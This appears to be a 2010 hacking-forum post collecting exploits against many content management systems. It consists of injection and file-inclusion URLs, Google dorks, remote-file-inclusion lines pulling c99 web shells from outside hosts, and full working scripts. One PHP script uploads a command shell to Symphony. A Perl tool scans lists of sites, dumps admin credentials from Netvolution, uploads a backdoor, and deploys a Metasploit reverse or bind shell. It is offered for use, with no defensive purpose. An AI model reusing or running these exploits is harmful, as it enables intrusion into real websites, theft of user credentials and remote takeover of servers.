Old 15.08.2010, 16:05   #1
Heartbreakers
Banned
Registered: 24.07.2009
Posts: 1,408

Vulnerabilities of various CMS


toronja cms
toronja cms SQL Injection Vulnerability
Code:
[site]/index.php?plantilla=contenido_lista&ncategoria1=[SQL Injection]
[site]/interior.php?IDIOMA=SP&plantilla=contenido&ncategoria1=[SQL Injection]
Cosmos Solutions cms
Cosmos Solutions cms SQL Injection Vulnerability
Code:
Exploit : http://localhost/index.php?mid=[SQL Injection]
Dork : "Webdesign Cosmos Solutions"
Exploit : [site]/p_inf.php?page=[SQL Injection]
Exploit : [site]/index.php?id=[SQL Injection]
Speedy-Shop 2.0 CMS
Speedy-Shop 2.0 CMS Blind SQL Injection Vulnerability
Code:
http://[site]/dettagli.asp?sid=NULL&idp=1+[BSQLi]
Dutch stats cms
Dutch stats cms Remote file inclusion
Code:
stats/tools.php?included=[Http://shell.com/c99.txt]
CMScout
CMScout <= 1.23 (index.php) Remote SQL Injection Vulnerability
Code:
http://[ site ]/index.php?page=forums&f=1/**/union/**/all/**/select/**/0,uname,passwd,2,3,4,5,6,7,8/**/from/**/cms_authuser/*
CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability
Code:
http://Example/common.php?bit=file.type%00
CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities
RFI:
Code:
http://[target]/[path]/index.php?page=mythings&cat=downloads&action=edit&id=null union all select 1,2,3,4,concat_ws(0x3a,uname,passwd),6,7,8,9,10,11 from cms_users--
http://[target]/[path]/admin.php?page=users&subpage=users_view&id=null union all select 1,2,concat_ws(0x3a,uname,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from cms_users--
LFI:
Code:
http://[target]/[path]/admin.php?bit=../../../../../boot.ini%00
http://[target]/[path]/index.php?bit=../../../../boot.ini%00
CMScout 2.08 SQL Injection Vulnerability
Code:
http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--
http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
CMScout (XSS/HTML Injection) Multiple Vulnerabilities
Code:
http://[site]/index.php?page=search&menuid=5
Symphony CMS
Symphony <= 1.7.01 (non-patched) Remote Code Execution Exploit
Code:
<?php
## Symphony <= 1.7.01 (non-patched) Remote Command Execution Exploit
## works regardless magic_quotes_gpc

echo "-----------------------------------------------------------------\n";
echo "Symphony <= 1.7.01 (non-patched) Remote Command Execution Exploit\n";
echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
echo "-----------------------------------------------------------------\n";

if ($argc<3) {
echo "USAGE:\n";
echo "~~~~~~\n";
echo "php {$argv[0]} [url] [cmd]\n\n";
echo "[url] - target server where Symphony is installed\n";
echo "[cmd] - command to execute\n\n";
echo "e.g. php {$argv[0]} http://site.com/ \"ls -la\"\n";
die;
}

/*
i) admin authorization bypass
vulnerable code in symphony/lib/class.admin.php:
------------------[source code]----------------------
function login($username, $password, $already_md5=false, $update=true){
$sql  = "SELECT *\n";
$sql .= "FROM `tbl_authors`\n";
$sql .= "WHERE `username` = '".addslashes($username)."'\n";
$sql .= "AND `password` = '".(!$already_md5 ? md5($password) : $password)."'\n";
$row = $this->_db->fetchRow(0, $sql);
[...]
}
[...]
if(isset($_COOKIE[__SYM_COOKIE__])){
$args = unserialize($_COOKIE[__SYM_COOKIE__]);
$result = $this->login($args['username'], $args['password'], true, false);
}
------------------[/source code]---------------------
password value from cookie is not properly sanitized so the code above is vulnerable
to a SQL-injection which leads to admin authorization bypass.

ii) arbitrary file upload in admin panel
file manager in admin panel allows arbitrary file upload including php scripts. This vuln
is actual only for non-patched version, nevertheless the SQL-injection above works on
patched version too
*/

error_reporting(0);
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);

$url = $argv[1];
$cmd = $argv[2];

$url_parts = parse_url($url);
$host = $url_parts['host'];
$path = $url_parts['path'];
if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80;

echo "[~] Uploading shell... ";
exploit($host,$path,$port) ? print("OK\n") : die("Failed\n");

echo "[~] Executing command... ";
$res = cmd($host,$path,$port,$cmd);
if ($res) {
   printf("OK\n%'-65s\n%s%'-65s\n",'',$res,'');
}else {
   die("Failed");
}

function exploit($host,$path,$port) {
   $ock = fsockopen(gethostbyname($host),$port);
   if (!$ock) return false;

   $data = "--------bndry31337\r\n";
   $data.= "Content-Disposition: form-data; ";
   $data.= "name=\"file\"; filename=\"s.php\"\r\n";
   $data.= "Content-Type: text/plain\r\n\r\n";
   $data.= "<?php echo @`{\$_POST['c']}`; ?>\r\n";
   $data.= "--------bndry31337\r\n";

   $data.= "--------bndry31337\r\n";
   $data.= "Content-Disposition: form-data; name=\"filter\"\r\n\r\n";
   $data.= "--------bndry31337\r\n";

   $data.= "--------bndry31337\r\n";
   $data.= "Content-Disposition: form-data; name=\"destination\"\r\n\r\n";
   $data.= "workspace/masters/\r\n";
   $data.= "--------bndry31337\r\n";

   $data.= "--------bndry31337\r\n";
   $data.= "Content-Disposition: form-data; name=\"action[upload]\"\r\n\r\n";
   $data.= "Upload\r\n";
   $data.= "--------bndry31337\r\n";

   $data.= "--------bndry31337\r\n";
   $data.= "Content-Disposition: form-data; name=\"with-selected\"\r\n\r\n";
   $data.= "With selected...\r\n";
   $data.= "--------bndry31337\r\n";

   $packet = "POST {$path}symphony/?page=/publish/filemanager/ HTTP/1.0\r\n";
   $packet.= "Host: {$host}\r\n";
   $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n";
   $packet.= "Cookie: sym_auth=a%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22";
   $packet.= "admin%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%2231337%27+OR+1%3D1+";
   $packet.= "+LIMIT+1%2F%2A%22%3Bs%3A2%3A%22id%22%3Bi%3A1%3B%7D\r\n";
   $packet.= "Content-Type: multipart/form-data; boundary=------bndry31337\r\n";
   $packet.= "Content-Length: ".strlen($data)."\r\n";
   $packet.= "Connection: close\r\n\r\n";

   $packet.= $data;

   fputs($ock, $packet);
   $html='';
   while (!feof($ock)) $html.=fgets($ock);

   return preg_match('@Location: .+?upload-success@',$html) ? true : false;
}

function cmd($host,$path,$port,$cmd) {
   $ock = fsockopen(gethostbyname($host),$port);
   if (!$ock) return false;
     $data   = "c=".urlencode($cmd);
     $packet = "POST {$path}workspace/masters/s.php HTTP/1.0\r\n";
   $packet.= "Host: {$host}\r\n";
   $packet.= "User-Agent: Opera/9.27 (Symphony fucker edition)\r\n";
   $packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
   $packet.= "Content-Length: ".strlen($data)."\r\n";
   $packet.= "Connection: close\r\n\r\n";
     $packet.= $data."\r\n";
     fputs($ock, $packet);
   $html='';
   while (!feof($ock)) $html.=fgets($ock);
     list($headers,$res)=explode("\r\n\r\n",$html);
   return strlen($res) ? $res : false;
}

?>
Symphony CMS Local File Inclusion Vulnerability
Code:
http://localhost/[path]/index.php?mode=[LFI]
http://localhost/index.php?mode=../../../../../../../../../../../../../../../etc/passwd%00
WsCMS
WsCMS XSS / SQL Injection Vulnerability
Code:
Exploit: [site]/news.php?id=[SQL Injection]
[site]/staff.php?id=[SQL Injection]  
[site]/products.php?cid=[SQL Injection]
[site]/our_work.php?id= [SQL Injection]

XSS/HTML Injection : [site]/news.php?id=<marquee><font color=red size=15>XSS</font></marquee>
Delivering Digital Media CMS
Delivering Digital Media CMS SQL Injection Vulnerability
Code:
http://server/index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--
PHProjekt
PHProjekt <= 5.1 Multiple Remote File Include Vulnerabilities
Code:
http://www.site.com/[PHProjekt_path]/lib/dbman_filter.inc.php?lib_path=[evil_scripts]
http://www.site.com/[PHProjekt_path]/lib/specialdays.php?path_pre=[evil_scripts]
PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities
Code:
http://[Target]/[Path]/cm_navigation-33.inc.php?path_pre=http://cmd.gif?
http://[Target]/[Path]/cm_navigation.inc.php?path_pre=http://cmd.gif?
http://[Target]/[Path]/cm_summary.inc.php?path_pre=http://cmd.gif?
Content Management System for Phprojekt 0.6.1 RFI Vulnerabilities
Code:
http://WwW.4RxH.CoM/cm/cm_navigation-33.inc.php?path_pre=http://rxh.freehostia.com/shells/c99in.txt?
http://WwW.4RxH.CoM/cm/cm_navigation.inc.php?path_pre=http://rxh.freehostia.com/shells/c99in.txt?
http://WwW.4RxH.CoM/cm/cm_summary.inc.php?path_pre=http://rxh.freehostia.com/shells/c99in.txt?
2CMS
2CMS SQL Injection Vulnerability
Code:
http://[site]/path/news_details.php?id=[sqli]
http://[site]/path/category.php?cid=[sqli]
WmsCMS
WmsCMS XSS / SQL Injection Vulnerability
Code:
SQLi & BSQLi
# http://[site]/default.asp (Parameter search)
# http://[site]/default.asp (Parameter sbr)
# http://[site]/default.asp (Parameter pid)
# http://[site]/default.asp (Parameter sbl)
# http://[site]/default.asp (Parameter FilePath)
# http://[site]/printpage.asp (Parameter sbr)
# http://[site]/printpage.asp (Parameter pr)
# http://[site]/printpage.asp (Parameter psPrice)
 
xss
# http://[site]/default.asp (Parameter = search)
# http://[site]/default.asp (Parameter = sbr)
# http://[site]/default.asp (Parameter = p)
# http://[site]/default.asp (Parameter = sbl)
AWCM CMS
AWCM CMS Local File Inclusion Vulnerability
Code:
<?php
 
print("
------------------------------------------------------------
| Awcm Cms Local File Inclusion Vulnerability
| By SwEET-DeViL
| x0.root(at)gmail.com
| example
|
| Exploit.php ".$argv[0]." example.com /path/ ../../../../../../../../etc/passwd
------------------------------------------------------------
");
$host =$argv[1];//;
$Path = "http://".$host.$argv[2];
       $CURL_in ="GET ".$Path."/notify.php?v=a HTTP/1.0\r\n";
       $CURL_in.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1)\r\n";
       $CURL_in.="Pragma: no-cache\r\n";
       $CURL_in.="Cookie: awcm_lang=".$argv[3]."".";\r\n";
       $CURL_in.="Connection: Close\r\n\r\n";
 
       if ( empty($argv[3]) ){
               echo "\n[-] Error : Exploit failed\n";
               die;
       }
 
       $FoN = @fsockopen($host, 80);
       if(!$FoN){
               echo "\n[-] Error : Can't connect to ".$host." !!\n";
               die;
       }
 
       fputs($FoN, $CURL_in);
       while (!feof($FoN)) $data .= fread($FoN, 1024);
       fclose($FoN);
 
       $error_1 = strstr( $data, "HTTP/1.1 404 Not Found" );
       if ( !empty($error_1) ){
               echo "\n[-] Error : 404 Not Found. \n";
               die;
       }
 
       $error_2 = strstr( $data, "HTTP/1.1 406 Not Acceptable" );
       if ( !empty($error_2) ){
               echo "\n[-] Error : 406 Not Acceptable. \n";
               die;
       }
 
 
 
$EXc = explode("</head>",$data);
$EXx = explode("<head>",$EXc[1]);
$CODE = strip_tags($EXx[0]);
$CODE2 = preg_replace("/\r|\t/",'',$CODE);
$CODE2 = trim($CODE2);
 
if (empty($CODE2)){
print ('
 
[-] Error : Sorry! File not Found
 
');
}else{
print ('
[+]
------------------------------------------------------------
').$CODE2;
 
 
 
print ('
 
------------------------------------------------------------
');
 
}
 
?>
Netvolution CMS
Netvolution CMS 1.0 (XSS/SQL) Multiple Remote Vulnerabilities
Code:
Version Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=100%20AND%20SUBSTRING(@@version,1,130)=5

Password Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20AND%20
(select%20(substring(userPassword,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608

Username Finding:
http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20
AND%20(select%20(substring(userName,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608

Cross Site Scripting
Set the variable email to >"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>
Netvolution CMS <= 2.x SQL Injection Exploit Script
Code:
#!/usr/bin/perl

#########################################################################################
#											#
# Exploit Title: Netvolution exploit script for CMS Version >= 2.xx.xx.xx		#
# Date: 10/6/2010				  					#
# Sotware Link: www.netvolution.net										#
# Exploited by: krumel									# 
# Exploit Coded: mr.pr0n								#
#                                     							#
# Many thanks to icesurfer (author of SQLNINJA) and all p0wnbox members.		#
# I have contact www.atcom.gr no response yet, although it seems that they have patch   #
# partially the software.								#
#########################################################################################
#											#
# This program is free software; you can redistribute it and/or				#
# modify it under the terms of the GNU General Public License				#
# as published by the Free Software Foundation; either version 2			#
# of the License, or (at your option) any later version.				#
# 											#
# This program is distributed in the hope that it will be useful,			#
# but WITHOUT ANY WARRANTY; without even the implied warranty of			#
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the				#
# GNU General Public License for more details.						#
#											# 
# You should have received a copy of the GNU General Public License			#
# along with this program; if not, write to the Free Software				#
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.		#
#											#
#########################################################################################

#Using some modules!
use LWP::UserAgent;
use IO::Socket;
use IO::Handle;

print "\e[1;31m  _   _      _              _       _   _                                _       _ _ 			\e[0m\n";    
print "\e[1;31m | \\ | |    | |            | |     | | (_)                              | |     (_) | 			\e[0m\n";  
print "\e[1;31m |  \\| | ___| |___   _____ | |_   _| |_ _  ___  _ __      _____  ___ __ | | ___  _| |_ 		        \e[0m\n"; 
print "\e[1;31m | . ` |/ _ \\ __\\ \\ / / _ \\| | | | | __| |/ _ \\| '_ \\    / _ \\ \\/ / '_ \\| |/ _ \\| | __|	\e[0m\n";
print "\e[1;31m | |\\  |  __/ |_ \\ V / (_) | | |_| | |_| | (_) | | | |  |  __/>  <| |_) | | (_) | | |_  		\e[0m\n";
print "\e[1;31m |_| \\_|\\___|\\__| \\_/ \\___/|_|\\__,_|\\__|_|\\___/|_| |_|   \\___/_/\\_\\ .__/|_|\\___/|_|\\__|	\e[0m\n";
print "\e[1;31m                                                                  | |                  			\e[0m\n";               
print "\e[1;31m                                                                  |_|  ...for CMS Version >= 2.xx.xx.xx 	\e[0m\n";

# ************* #
# Target dork.   
# ************* #
print "\nGoogle Dork:";
print "\n\e[1;45mallinurl: 'default.asp?pid'\e[0m\n";

# ************ #
# Main Menu.
# ************ #
menu:;

print "\n[*] Main Menu:\n";
print "    1. Automated list site scan for injection.\n";
print "    2. Export all Infomation_Schema Tables and Columns.\n";
print "    3. Find all Databases.\n";
print "    4. Export all usernames and passwords of the 'cms_Users' table.\n";
print "    5. Manuall exploitation.\n";
print "    6. Compatibility with the Metasploit Framework.\n";
print "    7. Exit.\n";

print "> ";
$option=<STDIN>;
print "\n";
if ($option!=1 && $option!=2 && $option!=3 && $option!=4 && $option!=5 && $option!=6 && $option!=7) 
{
print "\e[1;31mWrong Option!!\e[0m\n";
goto menu;
}
# Select Option.
if ($option==1)
{&site_scan} # Automated list site scan for injection.
if ($option==2)
{&info_schema_tables_and_columns}# Export all Infomation_Schema Tables and Columns.
if ($option==3)
{&extract_db}# Find all Databases.
if ($option==4)
{&automated_exploitation}# Export all usernames and passwords of the 'cms_Users'table.
if ($option==5)
{&manually}# Manuall exploitation.
if ($option==6)
{&metasploit}# Compatibility with Metasploit Project (Under construction).
if ($option==7)
{&quit}# Quit it!

# ******************************************* #
# Automated list site scan for injection.
# ******************************************* #
sub site_scan
{
$sites= "/Users/pentest/Desktop/sites.txt"; ########  ***[E_D_I_T  H_E_R_E]***  ##############
$scan = "10+and+1=convert(int,db_name(1))";

# Counter
$i = 1;
print "[*]Opening site list... \n";
open (SITELIST, $sites);
print "[*]Sitelist opened successfully!\n";
print "[*]Scanning...\n";
@sitelist = <SITELIST>;
   print "[*]Results:\n";
   for ($i; $i <= @sitelist; $i++)
   {  
       $host = $sitelist[$i]; 
       chop ($host);  
       $int = LWP::UserAgent->new() or die;
       $check=$int->get($host.$scan);   
          if ($check->content =~ m/value '(.*)' to/g)
          {
	    print "\e[1;36m$host\e[0m\n";
          }
    }
goto menu;
}

# ********************************************************** #
# Exploiting *all* the Infomation_Schema Tables and Columns.  
# ********************************************************** #
sub info_schema_tables_and_columns
{
# ***************#
# Table Counter 
# ***************#
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$atcom=<STDIN>;
print "Enter the range scanning of Tables (e.g.: 15): \n";
print "> ";
$endt =<STDIN>;

# Counter
$countt = 1;
print "\n[*] Exloiting Information_Schema Tables...\n";
    $infoschema_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables))";
    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$infoschema_t);
    if ($check->content =~ m/value '(.*)' to/g)
    {
       ($first_t) = $1;
        print "\e[1;33m$first_t\e[0m\n";
           @chars_t = split(//, "$first_t");
           $got_t = join("%", @chars_t);
           $first_t = "%27$got_t%27";
           for ($countt; $countt <= $endt; $countt++) 
           {
           $fullsqli_t = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20table_name%20from%20Information_Schema.tables%20where%20table_name%20not%20in($first_t)))";
       	   $int = LWP::UserAgent->new() or die;
           $check=$int->get($atcom.$fullsqli_t);
           if ($check->content =~ m/value '(.*)' to/g)
           {
             ($next_t) = $1;
             print "\e[1;33m$next_t\e[0m\n";
	     @chars_t = split(//, "$next_t");
             $got_t = join("%", @chars_t);
             $next_t = $got_t ;
             $first_t = $first_t.",%27".$next_t."%27";
           }
       }
     }
      else 
          {
	  print "\e[1;31mFAILED!\e[0m\n";
          }
# ***************#
# Column Counter 
# ***************#
print "Enter the range of scanning Columns (e.g.: 20)\n";
print "> ";
$endc =<STDIN>;

# Counter
$countc = 1;
print "[*] Exloiting Information_Schema Column...\n";
   $infoschema_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns))";    
   $int = LWP::UserAgent->new() or die;
   $check=$int->get($atcom.$infoschema_c);  
       if ($check->content =~ m/value '(.*)' to/g)
        {
          ($first_c) = $1;
          print "\e[1;33m$first_c\e[0m\n";
          @chars_c = split(//, "$first_c");
          $got_c = join("%", @chars_c);
          $first_c = "%27$got_c%27";
         for ($countc; $countc <= $endc; $countc++)
         {
           $fullsqli_c = "10+and+1=convert(int,(se%l%e%c%t%20top%20%201%20column_name%20from%20Information_Schema.columns%20where%20column_name%20not%20in($first_c)))";
           $int = LWP::UserAgent->new() or die;
           $check=$int->get($atcom.$fullsqli_c);
           if ($check->content =~ m/value '(.*)' to/g)
           {
            ($next_c) = $1;
            print "\e[1;33m$next_c\e[0m\n";
	    @chars_c = split(//, "$next_c");
            $got_c = join("%", @chars_c);
            $next_c = $got_c ;
            $first_c = $first_c.",%27".$next_c."%27";
          }
         }
       }
      else 
         {
         print "\e[1;31mFAILED!\e[0m";
         }
goto menu;
}

# *************************************** #
# Exploiting *all* the inside Databases. 
# *************************************** #
sub extract_db
{
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$atcom=<STDIN>;
print "Enter the range of scanning Databases (e.g.: 30)\n";
print "> ";
$enddb =<STDIN>;
# Counter
$countdb = 1;
print "[*] Exloiting the inside Databases....\n";
for ($countdb; $countdb <= $enddb; $countdb++)
{ 
    $db = "10+and+1=convert(int,db_name($countdb))";
    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$db);  
    if ($check->content =~ m/value '(.*)' to/g)
       {
        ($database) = $1;
         print "[ID:$countdb]","\e[1;35m$database\e[0m\n";
       }
       else 
          {
	   print "\e[1;31mFAILED!\e[0m\n";
          }
}
goto menu;
}

# ***************************************************************** #
# Exploiting *all* usernames and passwords of the table "cms_Users" 
# ***************************************************************** #
sub automated_exploitation
{
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$atcom=<STDIN>;
print "Enter the range of scanning userID (e.g.: 20)\n";
print "> ";
$end =<STDIN>;
# Counter
$count = 1;
print "[*] Exloiting Usernames and Passwords...\n";
for ($count; $count <= $end; $count++)
{ 
$useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29";
$userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29";
    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$useremail);   
    if ($check->content =~ m/value '(.*)' to/g)
    {
       ($email) = $1;
       print "[ID:$count]"," \e[1;32m$email\e[0m";
       $gotmail = $email; # Usage for the section of Metasploit Framework.
       $int = LWP::UserAgent->new() or die;
       $check=$int->get($atcom.$userpassword);
         if ($check->content =~ m/value '(.*)' to/g){
         ($pass) = $1;
         print " : \e[1;32m$pass\e[0m\n";
         $gotpass = $pass; # Usage for the section of Metasploit Framework.
         }
         else 
            {
            print " : \e[1;31m-\e[0m\n";
            }}
     else 
        {
        print "[ID:$count","] \e[1;31m-\e[0m : \e[1;31m-\e[0m\n";
        }
}
goto menu;
}

# **************************************** #
# Exploiting Columns and Tables manually.
# **************************************** #
sub manually
{
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$atcom=<STDIN>;
print "Enter the name of your target's Table (e.g.: cms_Users)\n";
print "> ";
$table =<STDIN>;
print "Enter your the name of your target's Column (e.g.: userpassword)\n";
print "> ";
$column =<STDIN>;
print "Enter the range of scanning (e.g.: 10)\n";
print "> ";
$endm =<STDIN>;

$countm = 1;
print "[*] Manuall Exploitation...\n";
for ($countm; $countm <= $endm; $countm++)
{ 
$manually = "10+and+1=convert(int,(se%l%e%c%t(substring($column,1,1000))%20from%20$table%20where%20userID=$countm%29%29";
    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$manually);   
    if ($check->content =~ m/value '(.*)' to/g){
       ($got) = $1;
       print "[ID:$countm]"," \e[1;32m$got\e[0m\n";
       }
       else 
          {
          print "[ID:$countm","] \e[1;31m-\e[0m : \e[1;31m-\e[0m\n";
          }
  }
goto menu;
}

# ***************************************************************** #
# Compatibility with the Metasploit Framework.
# ***************************************************************** #
sub metasploit
{
if (($gotmail eq "") or ($gotpass eq ""))
{
print "Enter your Target (e.g.: http://www.target.gr/default.asp?pid=73&artID=)\n";
print "> ";
$atcom=<STDIN>;
$end = 10;
$count = 1;
for ($count; $count < $end; $count++)
{ 
$useremail = "10+and+1=convert(int,(se%l%e%c%t(substring(useremail,1,1000))%20from%20cms_Users%20where%20userID=$count%29%29";
$userpassword = "10+and+1=convert(int,(se%l%e%c%t%20(substring(userpassword,1,10000))%20from%20cms_Users%20where%20userID=$count%29%29";

    $int = LWP::UserAgent->new() or die;
    $check=$int->get($atcom.$useremail);   
    if ($check->content =~ m/value '(.*)' to/g)
    {
       ($email) = $1;
       $gotmail = $email;
       $int = LWP::UserAgent->new() or die;
       $check=$int->get($atcom.$userpassword);
         if ($check->content =~ m/value '(.*)' to/g){
         ($pass) = $1;
         $gotpass = $pass;
         $end = $count;
         }}
}
}
if ($atcom =~ m/www.(.*).gr/g){
($site) = $1;
}

# Checking if the Metasploit Framework is already installed.
print "[*] Looking for the Metasploit Framework... ";
$msfcli = "";
$msfpayload = "";
if ($msfpath eq "") {
	$path1 = $ENV{PATH};
	@path = split(/:/,$path1);
	foreach (@path) {
		if (-e $_."/msfcli") {
			$msfcli = $_."/msfcli";
		} elsif (-e $_."/msfcli3") {
			$msfcli = $_."/msfcli3";
		}
		if (-e $_."/msfpayload") {
			$msfpayload = $_."/msfpayload";
		} elsif (-e $_."/msfpayload3") {
			$msfpayload = $_."/msfpayload3";
		}
	}
} else {
	if (-e $msfpath."/msfcli") {
		$msfcli = $msfpath."msfcli";
	} elsif (-e $msfpath."/msfcli3") {
		$msfcli = $msfpath."msfcli3";
	}
	if (-e $msfpath."/msfpayload") {
		$msfpayload = $msfpath."msfpayload";
	} elsif (-e $msfpath."/msfpayload3") {
		$msfpayload = $msfpath."msfpayload3";
	}
		
	}

if ($msfcli eq ""){
        print "[\e[1;31m FAILED \e[0m]\n";
	print "[-] msfcli not found\n";
	exit(-1);
        }

if ($msfpayload eq "") {
        print "[\e[1;32m FAILED \e[0m]\n";
	print "[-] msfpayload not found\n";
	exit(-1);
        }
print "[\e[1;32m DONE \e[0m]\n";

#Retrieve Cookie
system('curl -k -L -b cookies.txt -c cookies.txt -o step-1.html http://www.'.$site.'.gr/');
system('curl -k -L -b cookies.txt -c cookies.txt  -d email='.$gotmail.' -d password='.$gotpass.' -o step-2.html http://www.'.$site.'.gr/admin/default.asp?ac=2');

#Upload Web-Backdoor
system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@cmdasp.aspx http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles');

# Choose your payload.
print "Which payload you want to use?\n";
print "    1. Meterpreter\n    2. VNC\n";

while (($payload ne 1) and ($payload ne 2)) {
	print "msf > ";
	$payload = <STDIN>;
	chomp($payload);
        }

if ($payload == 1) {
	$payload = "meterpreter";
        } else {
	$payload = "vncinject";
        }

# Choose your connection.
print "Which type of connection you want to use?\n";
print "    1. bind_tcp\n    2. reverse_tcp\n";
while (($conn ne "1") and ($conn ne "2")) {
	print "msf > ";
	$conn = <STDIN>;
	chomp($conn);
        }

if ($conn == 1) {
	$conn = "bind_tcp";
        } else {
	$conn = "reverse_tcp";
        }

if ($conn eq "bind_tcp"){
	print "Enter your Remote host\n";
	print "msf > ";
	$rhost = <STDIN>;
	chomp $rhost
        } else {
	print "Enter your Public IP\n";
	print "msf > ";
	$lhost = <STDIN>;
	chomp $lhost ;
        print "Enter your Local Host\n";
	print "msf > ";
	$lhost1 = <STDIN>;
	chomp $lhost1 ;
	}

if ($conn eq "bind_tcp"){
	print "Enter Remote port number\n";
	} else {
	print "Enter local port number\n";
	}

$port = 0;
while (($port < 1) or ($port > 65535)){
	print "msf > ";
	$port = <STDIN>;
	chomp($port);
        }

# Choose your Encryption.
$enc = -1;
print "[*] Choose a payload encoding method:\n".
      "    0.  None\n".
      "    1.  Alpha2 Alphanumeric Mixedcase\n".
      "    2.  Alpha2 Alphanumeric Uppercase\n".
      "    3.  Avoid UTF8/tolower\n".
      "    4.  Call+4 Dword XOR\n".
      "    5.  Single-byte XOR Countdown\n".
      "    6.  Variable-length Fnstenv/mov Dword XOR\n".
      "    7.  Polymorphic Jump/Call XOR Additive Feedback\n".
      "    8.  Non-Alpha\n".
      "    9.  Non-Upper\n".
      "   10.  Polymorphic XOR Additive Feedback\n".
      "   11.  Alpha2 Alphanumeric Unicode Mixedcase\n".
      "   12.  Alpha2 Alphanumeric Unicode Uppercase\n";
while (($enc < 0) or ($enc > 12)) 
{
	print "msf > ";
	$enc = <STDIN>;
	chomp($enc);
}
$encoder = " encoder=";
for ($enc) 
{
	/^0$/ && do {$encoder = ""};
	/^1$/ && do {$encoder .= "x86/alpha_mixed "};
	/^2$/ && do {$encoder .= "x86/alpha_upper "};
	/^3$/ && do {$encoder .= "x86/avoid_utf8_tolower "};
	/^4$/ && do {$encoder .= "x86/call4_dword_xor "};
	/^5$/ && do {$encoder .= "x86/countdown "};
	/^6$/ && do {$encoder .= "x86/fnstenv_mov "};
	/^7$/ && do {$encoder .= "x86/jmp_call_additive "};
	/^8$/ && do {$encoder .= "x86/nonalpha "};
	/^9$/ && do {$encoder .= "x86/nonupper "};
	/^10$/ && do {$encoder .= "x86/shikata_ga_nai "};
	/^11$/ && do {$encoder .= "x86/unicode_mixed "};
	/^12$/ && do {$encoder .= "x86/unicode_upper "};
}

# Creation of the executable payload.
$exe = "backup".int(rand()*010101);
$command = $msfpayload." windows/".$payload."/".$conn.$encoder." exitfunc=process";

if ($conn eq "bind_tcp") 
{
	$command .= " lport=".$port." X > /tmp/".$exe.".exe";
	} else {
		$command .= " lport=".$port." lhost=".$lhost." X "."> /tmp/".$exe.".exe";
		}
		if ($verbose == 1) 
		{
		print "[v] Command: ".$command."\n";
		}
		system ($command);
		unless (-e "/tmp/".$exe.".exe") {
		print "[-] Payload creation... [\e[1;31m FAILED \e[0m]\n";
		exit(-1);
}

print "[*] Payload creation... [\e[1;32m DONE \e[0m]\n";
print "[*] Payload (".$exe.".exe) created.\n";

$xpl = '/tmp/'.$exe.'.exe';

#Upload the executable file to the remote Webserver.
system('curl -k -L -b cookies.txt -c cookies.txt -F name=file1 -F filename=@'.$xpl.' http://www.'.$site.'.gr/admin/tools/files/filesUpload.asp?folder=..%2F..%2F..%2Ffiles');

$parameter = $exe.".exe";

# The child handles the request to the target, the parent calls Metasploit Framework!
$pid = fork();
if ($pid eq 0) {
sleep(1);
exit(0);
}

# This is the parent.
$syscommand = $msfcli." exploit/multi/handler "."PAYLOAD=windows/".$payload."/".$conn." ";
if ($conn eq "bind_tcp")
	{
	$syscommand .= "LPORT=".$port." RHOST=".$rhost." E";
	print "\e[1;34m$syscommand\e[0m\n";
	} else {

		$syscommand .= "LPORT=".$port." LHOST=".$lhost1." E";
		print "\e[1;34m$syscommand\e[0m\n";
		}
#Execute msfcli
print "Are you ready to execute msfcli? (Press Enter)\n";
print "msf > ";
$enter = <STDIN>;
chomp($enter);
print " Please Wait...";
print "[*] Executing the msfcli... [\e[1;32m DONE \e[0m]\n";

system("xterm -bg black -fg white -bd black -e ".$syscommand." &"); # If you don't have xterm, install IT!
sleep(30); # Sleep 30 seconds to fire up Metasploit Framework!

